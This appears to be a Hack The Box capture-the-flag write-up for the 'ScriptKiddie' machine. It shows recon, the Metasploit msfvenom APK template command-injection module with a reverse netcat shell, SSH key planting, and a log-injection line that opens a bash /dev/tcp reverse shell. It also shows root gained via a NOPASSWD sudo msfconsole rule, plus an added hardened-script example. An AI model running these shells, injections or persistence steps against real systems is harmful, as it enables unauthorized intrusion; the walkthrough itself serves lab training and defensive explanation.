scriptkiddie

Introduction:
Recon
eneloop@kinetic:…/hackthebox/scriptkiddie/data$ sudo nmap -sS -sV -sC -T4 -O -oN nmap.scriptkiddie.txt 10.129.73.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-07 10:59 EST
Nmap scan report for scriptkiddie (10.129.73.101)
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/7%OT=22%CT=1%CU=39686%PV=Y%DS=2%DC=I%G=Y%TM=60200E84
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds

Two services only: SSH and a Flask/Werkzeug app on 5000 titled "k1d'5 h4ck3r t00l5". Werkzeug 0.16.1 with Python 3.8.5 is a dev-server stack, so the web app on 5000 is the attack surface; SSH becomes useful later once a key can be planted.
Enumeration
Exploitation
The module used here targets msfvenom's handling of a user-supplied APK template (the command injection tracked as CVE-2020-7384): it produces an APK that makes the target's msfvenom run the chosen payload when the file is used as a template. Two things to watch in the options: LHOST defaulted to 10.0.0.8 and had to be set to the attacker's lab address, and DisablePayloadHandler is True, so the module starts no listener and a separate nc listener on LPORT is needed to catch the shell.

msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   FILENAME  msf.apk          yes       The APK file name

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   LHOST  10.0.0.8         yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   DisablePayloadHandler: True   (no handler will be created!)

Exploit target:

   Id  Name
   0   Automatic

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set lhost 10.10.14.124
lhost => 10.10.14.124
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
Once the generated msf.apk is processed by the target's msfvenom, the listener receives a shell as kid, the user the web app runs as:

(py3) eneloop@kinetic:/oscp/tools/threader3000$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.124] from (UNKNOWN) [10.129.73.101] 56756
ls -l
total 20
drwxrwxr-x 2 kid kid 4096 Feb  3 07:40 __pycache__
-rw-rw-r-- 1 kid kid 4408 Feb  3 11:03 app.py
drwxrwxr-x 3 kid kid 4096 Feb  3 07:40 static
drwxrwxr-x 2 kid kid 4096 Feb  3 07:40 templates
whoami
kid
pwd
/home/kid/html
cd ..
ls
html
logs
snap
user.txt
cat user.txt
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
kid:x:1000:1000:kid:/home/kid:/bin/bash
pwn:x:1001:1001::/home/pwn:/bin/bash

Two accounts with a real login shell besides root: kid (the current shell) and pwn, which matters for the privilege escalation later.

The netcat shell has no tty, so the next step is to plant an SSH key for a proper session. kid already has a key pair and an authorized_keys file:

cd .ssh
/bin/sh: 5: cd: can't cd to .ssh
cd
cd .ssh
ls -all
total 20
drwx------  2 kid kid 4096 Feb  3 07:40 .
drwxr-xr-x 11 kid kid 4096 Feb  3 11:49 ..
-rw-rw-r--  1 kid kid  570 Jan  5 20:40 authorized_keys
-rw-------  1 kid kid 2602 Jan  5 20:40 id_rsa
-rw-r--r--  1 kid kid  570 Jan  5 20:40 id_rsa.pub
cat authorized_keys
ssh-rsa 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 kid@scriptkiddie
echo 'ssh-rsa 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 eneloop@kinetic' >> authorized_keys
cat authorized_keys
ssh-rsa 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 kid@scriptkiddie
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC76FPkryUBruyx59tBXWp6/TAN+digwvzzGPr93fMPRd+O4av7leGfwOi7MPiAOOm0mf/UEWvASodSjjwt8cCTlD1GAeHpU3NuXmiEKKtoGRLTjmLPQGZ6w4H3mGVU3DtmGle4s2g0MVilkOqs1n8Ulm1t9sYdOTPfxbs83r4jJfaFjcM3pOD2Br3rrXr//i4BqdT51KmtcFpv3H+LL2LFpBEnO5mPRxbJEJ1cJwnLOAALKLhn3nFXN4VpYUrtE0e1h+ihYIk92NMaSbkP6gyaVBzvdAY6+KxbHE1JEHyyrhaABMQhovenEdiocLujfImSFKy0bxUSlJhqKexyBevhijTxitCm1Br6YvNiyLSfb4+KmdSwg/kicTRdrapFj0+vciCoOWVJHDCtG7rvMprlysZayYRuWV0o6gOd2XhKIAejsy0RBg9PIXN3Ow8UzbpCV9T/JlhNwE5pJq5NPQnLkHfduoSOu3Qat2qUnwjrTAzKvYKV4sGMqx4jXiiLk+M= eneloop@kinetic

Appending to authorized_keys (rather than replacing it) keeps the existing kid key working and avoids breaking anything on the box; it does leave an obvious artifact (a foreign key and a fresh mtime on the file), which is what a defender would look for.
Logging in with the private half of the appended key (kept locally as id-temp):

root@kinetic:/dev/shm# ssh -i id-temp kid@scriptkiddie
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-65-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Feb  7 19:24:07 UTC 2021

  System load:  0.08               Processes:             225
  Usage of /:   36.7% of 17.59GB   Users logged in:       0
  Memory usage: 10%                IPv4 address for ens160: 10.129.73.101
  Swap usage:   0%                 IPv6 address for ens160: dead:beef::250:56ff:feb9:f51a

1 update can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable

Last login: Wed Feb  3 12:07:35 2021 from 10.10.14.4
kid@scriptkiddie:~$
Post-exploit/PrivEsc
The privilege escalation was done in a later session (note the date, and that the attacker and target addresses below differ from the ones used above). First, linpeas was pulled over from a local HTTP server:

kid@scriptkiddie:/tmp$ wget http://10.10.14.38:8000/linpeas.sh
--2021-02-13 14:08:32--  http://10.10.14.38:8000/linpeas.sh
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 313316 (306K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[==============================================>] 305.97K  --.-KB/s    in 0.08s

The lead from enumeration is a script in the other user's home directory that kid can read: /home/pwn/scanlosers.sh.
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

The script reads a log file that kid can write to (/home/kid/logs/hackers), drops the first two space-separated fields of every line, and splices whatever is left, unquoted, into a string handed to sh -c. It runs as pwn (what triggers it is not shown here, but the shell that comes back below belongs to pwn), so everything from the third field onward is parsed and executed by pwn's shell. A quick local test shows exactly what survives the cut:

kid@scriptkiddie:/home/pwn$ cat /tmp/test
ABC ABC ";echo 'hi kid'>/tmp/hikid.txt"adasdsd eadadasdasdas asdasdasfasdf wdawdawdawd
kid@scriptkiddie:/home/pwn$ cat /tmp/test | cut -d' ' -f3-
";echo 'hi kid'>/tmp/hikid.txt"adasdsd eadadasdasdas asdasdasfasdf wdawdawdawd

So a line whose third field begins with ; terminates the nmap command early, and a trailing # comments out the rest of the sh -c string (the .nmap suffix, the second ${ip}, and the redirections), so nothing has to be balanced. With a listener waiting on 8080, appending one line to the log is enough:

kid@scriptkiddie:/home/pwn$ ls
recon  scanlosers.sh
kid@scriptkiddie:/home/pwn$ echo "ABC DEF ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.38/8080 0>&1' #" >>/home/kid/logs/hackers
kid@scriptkiddie:/home/pwn$
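The following is an added example written for this page, not the box's scanlosers.sh and not code from the original write-up. It puts the scanlosers.sh pattern (untrusted log fields spliced into a sh -c string) next to a hardened version and runs both against a constructed log file. Assumptions: log lines look like "<field1> <field2> <attacker text>", matching the cut -d' ' -f3- of the original; echo stands in for nmap so it runs offline; the sample log and the INJECTED marker are invented for the demo. The same bug class, text from an untrusted file pasted into a shell command string, is what the msfvenom APK template module in the Exploitation section abuses on the other side.

```shell
#!/bin/sh
# Added example, not code from the box or the original write-up.
# Reproduces the scanlosers.sh pattern and shows one way to harden it.
# Assumptions: log lines are "<field1> <field2> <attacker text>", matching
# the cut -d' ' -f3- in the original; 'echo' stands in for nmap so the
# example runs without nmap or network access.

# Constructed stand-in for /home/kid/logs/hackers (not the real file).
make_sample_log() {
    f=$(mktemp) || return 1
    printf '%s\n' \
        'ABC DEF 10.10.14.38' \
        'ABC DEF 10.10.14.38' \
        'ABC DEF ;echo INJECTED #' >"$f"
    printf '%s' "$f"
}

# Field extraction exactly as scanlosers.sh does it.
extract_targets() {
    cut -d' ' -f3- "$1" | sort -u
}

# Vulnerable form: the field is spliced into a string that sh -c parses
# again, so ';' starts a new command and '#' discards the rest of the line.
scan_vulnerable() {
    extract_targets "$1" | while read -r ip; do
        sh -c "echo nmap --top-ports 10 -oN recon/${ip}.nmap ${ip}"
    done
}

# Accept only a dotted-quad IPv4 address: four 1-3 digit fields, each <= 255.
is_ipv4() {
    addr=$1
    case "$addr" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $addr
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ ${#o} -le 3 ] && [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Hardened form: validate first, then pass the value as a single argv
# element. No shell re-parses it, so metacharacters are inert.
scan_hardened() {
    extract_targets "$1" | while read -r ip; do
        if is_ipv4 "$ip"; then
            echo nmap --top-ports 10 -oN "recon/${ip}.nmap" "$ip"
        else
            printf 'rejected: %s\n' "$ip" >&2
        fi
    done
}

# Demo: the vulnerable loop prints INJECTED, the hardened loop rejects the line.
demo() {
    log=$(make_sample_log) || exit 1
    echo '--- vulnerable loop ---'
    scan_vulnerable "$log"
    echo '--- hardened loop ---'
    scan_hardened "$log"
    rm -f "$log"
}

case "${1-}" in --demo) demo ;; esac
```

Run it as sh scanlosers_demo.sh --demo. The point of the hardened loop is that quoting "${ip}" inside the sh -c string would not have been enough: the value would still be fed to a second shell parser, where a double quote or $(...) in the field escapes again. Removing the intermediate sh -c and allow-listing the value as an address closes the whole class, and the trust-boundary problem (a pwn-owned script consuming a kid-writable file) is still worth fixing separately.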
(py3) eneloop@kinetic:…/tools/PEAS/linPEAS$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.226] 43842
bash: cannot set terminal process group (864): Inappropriate ioctl for device
bash: no job control in this shell
The shell arrives as pwn. The sudo rules for pwn are the last step:

pwn@scriptkiddie:~/.ssh$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~/.ssh$ sudo /opt/metasploit-framework-6.0.9/msfconsole
[msfconsole ASCII-art banner, https://metasploit.com]
       =[ metasploit v6.0.9-dev                          ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: You can use help to view all available commands
msf6 > cd /root
msf6 > ls
[*] exec: ls

root.txt
snap
msf6 > cat root.txt
[*] exec: cat root.txt

cd is an msfconsole built-in, but ls and cat are not: anything msfconsole does not recognise as one of its own commands is handed to the system shell (the "[*] exec:" lines), and because sudo launches it as root with no password, every such command runs as root. A NOPASSWD sudo entry for msfconsole is therefore a root shell, not a restricted tool; the same applies to any sudo rule on a program with a built-in shell escape.
Notes: